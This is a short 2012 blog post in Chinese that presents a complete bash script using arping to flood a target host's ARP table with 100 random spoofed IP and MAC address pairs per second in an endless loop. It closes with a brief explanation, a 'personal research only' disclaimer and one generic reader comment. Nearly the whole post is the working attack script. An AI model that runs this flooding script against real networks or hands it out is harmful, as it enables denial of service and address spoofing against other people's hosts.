Wednesday, March 07, 2012

ARP/MAC address flooding attack

在BT5結合arping測試工具,寫了一個簡單的script來測試目標主機可否hold得住ARP/MAC address flooding attack,script內容如下:
root@bt:~# cat bin/arp_cache.sh
#!/bin/bash

function arp_cache_attack
{
while true;
do
for((i=1;i<=100;i++))
do
mac=$(($RANDOM%10))
number1=$(($RANDOM%254))
number2=$(($RANDOM%254))
number3=$(($RANDOM%254))
number4=$(($RANDOM%254))
arping -S "$number1.$number2.$number3.$number4" -s 00:00:00:00:$mac:$mac 10.10.6.6 -c 1 &
done
sleep 1
kill `ps aux | grep -i arping | grep -v grep | awk -F" " '{ print $2 }'` 1>/dev/null
sync && echo "3" > /proc/sys/vm/drop_caches
echo "re-generate"
done
}

arp_cache_attack

此script每次會產生100筆隨機的假IP與MAC address去嘗試塞滿目標主機(10.10.6.6於以上script中)的arp table。

僅供個人研究,請勿以此script測試或攻擊別人的主機。

1 comment:

Anonymous said...

nice opinion.. thanks for sharing..